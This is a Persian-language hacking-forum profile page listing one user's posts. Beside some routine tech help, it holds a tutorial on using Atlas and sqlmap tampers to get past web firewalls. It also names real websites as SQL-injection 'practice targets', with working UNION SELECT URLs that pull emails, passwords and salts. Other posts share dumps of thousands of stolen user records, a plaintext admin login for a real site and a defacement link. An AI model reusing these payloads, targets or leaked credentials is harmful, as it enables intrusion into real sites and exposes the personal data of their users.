discord icon
سرور دیسکورد گاردایران

mownten

کاربر انجمن
 نمایش نمایه  مشاهده فعالیت های این کاربر

  • تعداد ارسال ها

    314

  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    82

تمامی مطالب نوشته شده توسط mownten

  1. mownten

    معرفی روش

    mownten پاسخی برای R2L3N در یک موضوع ارسال کرد در سوال و جواب های شبکه

    سلام. از هر جایی که اینترنت میگیرید برای خونه یا محل کار باید درخواست فعالسازی IP VALID بدید.
  2. mownten
    اگر هم یک موقع دیدید که اینترنت ندارید و در هر کادر خاصی از پنجره ها بودید . حتی وقتی که یه جا پسوردتون ذخیره هست ولی یادتون رفته و میخواید ببینیدش که چی ذخیره شده میتونید با google chrome یا mozilla firefix روی کادر پسورد کلیک راست کنید و و Inespect رو بزنید. توی کدهای اون کادر میبینید که این عبارت نوشته شده: type=password این یعنی اینکه اون کادر موظف هست هر ورودی که داره رو به شکل پسورد با علامت ستاره نشون بده. شما هم عبارت password رو به text تغییر بدید و اینتر بزنید. میبینید که متن رو واضح نشون میده. این هم مال مواقعی که بخواید بصورت دستی، یه پسورد رو بخونید. موفق باشید
  3. mownten

    XXS

    mownten پاسخی برای An0nyM0us در یک موضوع ارسال کرد در باگ های امنیتی

    سلام. دوست عزیز می بینم که تازه به جمع ما اضافه شدی و خوش اومدی. انگیزه ای هم داری برای انتشار اطالعات که خیلی خوبه. حتی این سمپل های XSS بدرد من هم میخوره. فقط ازت میخوام که کمی تمیزتر کار کنی. توضیحاتت رو توی فایل متنی ننویس. همین جا توی پست بنویس. لطفا کدها و دستورات رو توی یه فایل zip بذار با پسورد guardiran.org و بعدا پیوست کن. اینجوری خیلی بهم ریخته س جسارتا. موفق باشی.
  4. mownten
    سلا. چه فرقی داره؟ اون آموزش مال تیر ماه سال 94 هست و حدود پنج سال ازش میگذره شما هم میتونی آخری نسخه ی accunetix رو بگیری و نصب کنی.
  5. mownten
    [سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: http://site.com/index.php?id=Price_ASC و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: https://github.com/m4ll0k/Atlas موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip
  6. mownten
    تا اونجا که من میدونم راهی نداری
  7. mownten
    خب دکمه شیفت رو نگه دار و چند بار روش کلیک کن ببین باز میشه یا نه. در واقع خود فعال کننده باید غیرفعالش کنه. شوخی نداره دیپ فریز با کسی
  8. mownten
    سلام. داداش زیاد watch dogs بازی کردیا. مگه هر کی به هرکیه؟ این حرفا چیه میزنی؟ شما فقط دریافت کننده از هسته ی کدنویسی هستی نه تعیین کننده. اصلا چطور میخوای شکلک بذاری که برات دستور اجرا کنن؟ چرا همچین تصوری بالیوودی از علوم سایبری داری؟
  9. mownten
    سلام دوستان. الان نسخه 10.2 نرم افزار Sqli Dumper رو دیدم که وبسایت psntools.ir معرفی کرده بود و توی کانال تلگرامیشون گذاشته بودن. من خودم از ورژن 9.7 استفاده میکنم و به نسبت 9.7، اجزایی به این نسخه اضافه شده اما حس میکنم کمی سرعتش پایین تر از 9.7 هست. در هر صورت میذارمش که بررسی کنید. ضمناً مسئولیت هرگونه سوء استفاده از این ابزار بر عهده کاربر هست. رمز : guardiran.org SQLiDumper 10.2.zip
  10. mownten
    یعنی خودت زدی فعالش کردی؟ ورژن چند هست؟ باید شیفت رو نگه داری و روش کلیک کنی تا کادر پسوردش باز بشه.
  11. mownten

    پاک شدن ویروس

    mownten پاسخی برای archer در یک موضوع ارسال کرد در سوال و جواب های عمومی

    سوال رو بصورت شخصی پرسیدید و جوابتون رو دادم. چرا پست میکنید دیگه؟
  12. mownten
    لینک: https://www.linleygroup.com/mpr/login.php?session_id=km8g8u96v5cre2h2709taknp81&return_url=/mpr/article.php?id=12264&num=1671 تعداد: حدود 27000 ردیف اطلاعات کاربری شامل ایمیل، پسورد هش شده، آدرس کامل، تلفن و غیره محتویات : یک فایل xml رمز فایل فشرده: guardiran.org linleygroup.com -27000 Rows.zip
  13. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    یک تارگت تمرینی: https://www.bible-history.com/subcat.php?id=2 حدود 20 تا دیتابیس داره. اکثرا وردپرس هستن. پسوردها رمزنگاری شده به جز یکی از دیتابیس ها که مشخصاتش اینه: user: jc pass: Mos3s اگر هم خواستید به صورت دستی پیش برید از این لینک استفاده کنید: https://www.bible-history.com/subcat.php?id=-2+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4--+- فایل دامپ یوزرهای کل دیتابیس ها هم پیوست میکنم. امیدوارم بدردتون بخوره. رمز: guardiran.org موفق باشید www.bible-history.com - 20 DBS.zip
  14. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    فدراسیون تکواندو اسراییل خودشم مشکل داره تارگت خوبیه. با ق.ن.دشکن برید: https://isr-tkd.com/index.php?cntr=e/news.php?id=1
  15. mownten
    لینک: http://lejdesigns.com/tp/user.php?id=3 تعداد: حدود 5000 ردیف شامل یوزرنیم، پسورد، سالت و غیره محتویات: یک فایل xml رمز فایل فشرده: guardiran.org lejdesigns.com -4893 Rows.zip
  16. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    فقط محض تمرین http://animalbehaviorandcognition.org/article.php?id=1110 این یکی هم هست و میتونید برید سعی کنید بهش لوگین بشید لینک: http://www.geliomar.ru/index.php?id=747 Login Link: http://www.geliomar.ru/manager یوزر و پسورد: Roslov 3432585e6eba2323315400617ae59d96 = dfyz
  17. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    این یه وبسایت گیم هست که جدول هاش شامل ستون های مرتبط با جزئیات آی دی بازی ها هست. دیتابیسش هم MariaDB هست https://www.battleoflegends.com/game.php?id=7
  18. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    این تارگت هم فایروال داره. اسم فایروالش 360websec هست. خودمم دارم باهاش کشتی میگیرم. برای تمرین شماها هم خوبه: http://120.25.219.52/sell2/game.php?id=48 توی این لینک هم میتونید آموزش های مربوط به بایپس فایروال ها رو یاد بگیرید و تست کنید: https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
  19. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    این تارگت هم فایروال داره و برای تمرین بایپس ارور Not Acceptable عالیه. میتونید از کد زیر برای بایپس استفاده کنید: /*!50000*/ http://www.susandaulfolkart.com/item.php?ID=-13
  20. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    اینم یه تارگت با کلی یوزر و همچنین پسورد رمزنگاری شده. امیدوارم مفید باشه: https://www.rentquip.com/item.php?id=-46'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,(SELECT+GROUP_CONCAT(email," ",password," ",salt+SEPARATOR+0x3c62723e)+FROM+users),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+-
  21. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    https://www.agsc.org/store/item.php?id=1 این تارگت فایروال داره و برای تمرین خوبه
  22. mownten

    تارگت های Sql Injection

    mownten پاسخی برای C0d3!Nj3ct!0n در یک موضوع ارسال کرد در تارگت های تمرینی

    نه تاپیک خواب نیست. https://www.amtechnologies.in/blog-item.php?id=-1
  23. mownten
    سلام به همه ی دوستان. از اونجا که ویروس کورونا همه چیز رو به تعطیلی کشونده و من هم نمیتونم بشینم در و دیوار رو نیگا کنم، تصمیم گرفتم دوره های آموزشی بیشتری ببینم. در همین حین تصمیم گرفتم کمبوهایی که از سایت های مختلف دامپ میکنم رو براتون بذارم. استفاده کنید. هر کسی هم که توی زمینه Sql Injection اقدام به دامپ کمبو میکنه، ازش دعوت میکنم بیاد بذاره تا بدرد بقیه هم بخوره. ضمنا دوستان سعی کنن اطلاعات رو طبق همین فرمت که گذاشتم بذارن. اولین کمبویی که میخوام بذارم مربوط به وبسایت edmazur.com هست. لینک: http://edmazur.com/game/item.php?id=15 تعداد: فقط یکی از فایلها که دیتای اعضا هست ، بالای 18000 ردیف شامل Username و Email و Password داره.(البته کمی خورده شیشه هم داره لکن پسورد ها رمزنگاری نشدن.) محتویات: 4 فایل csv و دو فایل xml - فایل csv تا حد ممکن که مربوط به ربات هاشون هست رمزگشایی شده و فایل xml بدون رمزنگاری هست رمز فایل فشرده: guardiran.org edmazur.com Combos (Guardiran.org).zip
  24. mownten
    http://zone-h.org/mirror/id/33254569
  25. mownten

    apt-get update
    apt-get upgrade -y
     apt-get isntall -f gdm3
    به ترتیب از این سه دستور استفاده کن.
    @aliagha